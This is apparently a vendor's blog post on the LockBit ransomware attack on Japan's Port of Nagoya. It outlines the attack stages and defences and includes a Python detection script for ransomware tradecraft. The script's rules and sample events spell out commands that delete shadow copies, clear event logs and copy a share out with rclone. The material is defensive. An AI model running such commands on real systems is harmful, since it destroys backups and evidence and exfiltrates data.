Ransomware Attack Hits Japan’s Biggest Port – how can you prevent such an attack?

Last Tuesday, the Port of Nagoya, Japan's biggest maritime port, was crippled by a cyberattack attributed to a Russian-linked group. The port's operation was disrupted for several days because containers could not be loaded or unloaded. While many cyberattacks have targeted international ports in recent months (we counted no fewer than 34 ports targeted in less than a year), this one is considered a step up: it affected the physical operation of the port and not just its public website.

We wanted to take a minute to explain the details of these attacks and how to prevent them.

The recent attacks on port websites were usually Distributed Denial of Service (DDoS) attacks: a botnet of compromised machines floods the website with requests at the same time, creating a spike in traffic so large that the site can no longer serve legitimate clients. No data is stolen, and the attack can be mitigated with a DDoS mitigation service such as Cloudflare. Such attacks tend to shut down access for a few hours at most.

The attack on the Port of Nagoya was different. It was a ransomware attack that encrypted files needed to run the port, resulting in an actual halt to operations. The attack was attributed to the Russian-linked group "LockBit" and its ransomware, LockBit 3.0. LockBit is a sophisticated toolset, and the LockBit group is a major player in cybercrime; it is believed to be responsible for over one-third of all recent ransomware attacks.

How does LockBit 3.0 work, and what can we do to prevent such attacks?

LockBit affiliates typically gain a foothold in the target network by exploiting exposed or weakly protected Remote Desktop (RDP) services, by phishing (malicious attachments or links in email), or by exploiting known vulnerabilities in public-facing applications. Once inside, they often use "Chocolatey", an open-source Windows package manager, to install their tooling, and then deploy the ransomware "payload". LockBit 3.0 is harder to catch than its predecessors because the payload is shipped encrypted and only unpacks itself when launched with the correct key argument, which blunts signature-based anti-virus scanning and sandbox analysis.

After the payload is in place, the attackers map the compromised network (hostnames, network services, remote access protocols) and harvest credentials stored or exposed on the systems they already control, using them to gain elevated privileges and move laterally. LockBit is known to spread its payload across the network using Server Message Block (SMB), Group Policy Objects, and PsExec. Data is sent back to the attacker's infrastructure using StealBit (the group's own exfiltration tool) and rclone together with public file-sharing services. Finally, the ransomware encrypts files across the network, deletes local backups such as volume shadow copies along with event logs, and replaces the desktop wallpaper with the ransom demand.

Protection from such attacks should focus on the following:

  • Continuous vulnerability scanning and patching, with priority on internet-exposed services such as RDP and public-facing applications
  • Network Detection and Response (NDR) tooling tuned to the specific systems used in your business (including maritime OT), so that anomalies such as unexpected SMB or PsExec activity and bulk uploads to file-sharing services are identified quickly
  • Network segmentation to limit damage (for example, between crew and operations networks, and between IT and OT), so that a compromise in one zone cannot spread freely to the others
  • Regular off-network backups with version history, with restores tested, so that recovery does not depend on backups the attacker can reach and delete
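The attack chain above maps onto a handful of host-level signals that a detection team can alert on: a PsExec service being installed, shadow copies being deleted, event logs being cleared, Chocolatey pulling in tools, and rclone pushing data out. The following is an added example (not code from the original article or from Cydome) of a small rule set that flags those signals over constructed Windows event records and then correlates them per host; the event schema, field names, host names and log lines are all constructed for this example and would need to be mapped onto your own SIEM or EDR data.

```python
"""Added example: rule-based detection of LockBit-style tradecraft over
constructed Windows event records. Not from the original article or Cydome.

Event IDs used (standard Windows values):
  4688 = process creation, 7045 = new service installed, 1102 = audit log cleared.
The Event schema, host names and sample command lines below are constructed
for illustration and must be mapped onto your own log source.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Set, Tuple


@dataclass(frozen=True)
class Event:
    host: str
    event_id: int
    image: str      # executable path (empty for 1102)
    cmdline: str    # full command line (empty for 1102)


def _cmd_matches(pattern: str) -> Callable[[Event], bool]:
    """Predicate: a process-creation event whose command line matches pattern."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda e: e.event_id == 4688 and rx.search(e.cmdline) is not None


# (rule name, attack stage, predicate), one rule per stage described in the article
RULES: List[Tuple[str, str, Callable[[Event], bool]]] = [
    ("psexec_service_install", "lateral movement via PsExec",
     lambda e: e.event_id == 7045 and "psexesvc" in e.image.lower()),
    ("chocolatey_tool_install", "tooling installed via Chocolatey",
     _cmd_matches(r"\bchoco(\.exe)?\s+install\b")),
    ("shadow_copy_deletion", "backup destruction",
     _cmd_matches(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b|\bwmic(\.exe)?\s+shadowcopy\s+delete\b")),
    ("event_log_clearing", "log destruction",
     lambda e: e.event_id == 1102 or _cmd_matches(r"\bwevtutil(\.exe)?\s+cl\b")(e)),
    ("rclone_exfiltration", "exfiltration via rclone to cloud storage",
     _cmd_matches(r"\brclone(\.exe)?\s+(copy|sync|move)\b")),
]


def scan(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (host, rule name, stage) for every event that trips a rule."""
    hits = []
    for e in events:
        for name, stage, pred in RULES:
            if pred(e):
                hits.append((e.host, name, stage))
    return hits


def correlate_hosts(hits: List[Tuple[str, str, str]], min_rules: int = 2) -> List[str]:
    """Hosts on which at least min_rules distinct rules fired: a single hit may be
    an admin at work, several stages on one host is far more likely an intrusion."""
    per_host: Dict[str, Set[str]] = {}
    for host, name, _ in hits:
        per_host.setdefault(host, set()).add(name)
    return sorted(h for h, names in per_host.items() if len(names) >= min_rules)


# Constructed sample telemetry (not real port data): two hosts under attack, one benign.
SAMPLE_EVENTS: List[Event] = [
    Event("ops-ws01", 4688, r"C:\ProgramData\chocolatey\choco.exe", "choco install -y rclone"),
    Event("ops-ws01", 7045, r"C:\Windows\PSEXESVC.exe", ""),
    Event("tos-srv02", 4688, r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    Event("tos-srv02", 4688, r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security"),
    Event("tos-srv02", 4688, r"C:\Tools\rclone.exe", r"rclone.exe copy C:\Shares\Ops remote:bucket --transfers 8"),
    Event("fin-ws09", 4688, r"C:\Windows\notepad.exe", "notepad.exe berth-plan.txt"),
]


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for host, name, stage in found:
        print(f"{host}: {name} ({stage})")
    print("hosts with multiple stages:", correlate_hosts(found))
```

On the constructed sample, the single-event rules fire five times across the two attacked hosts and none on the benign workstation, and the per-host correlation narrows the alert list to the two hosts where more than one stage was observed. The regexes are deliberately narrow (exact tool names and verbs) so the rules stay cheap; in production you would feed them from an EDR or Sysmon process-creation stream and tune the patterns to your own administrative tooling.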

To see a live example of a maritime cyber attack taking over a vessel's navigation system, check out our recent webinar.

Feel free to contact us to discuss how you can protect your business from such attacks. With Cydome maritime cyber security, we can make the seas safer together!
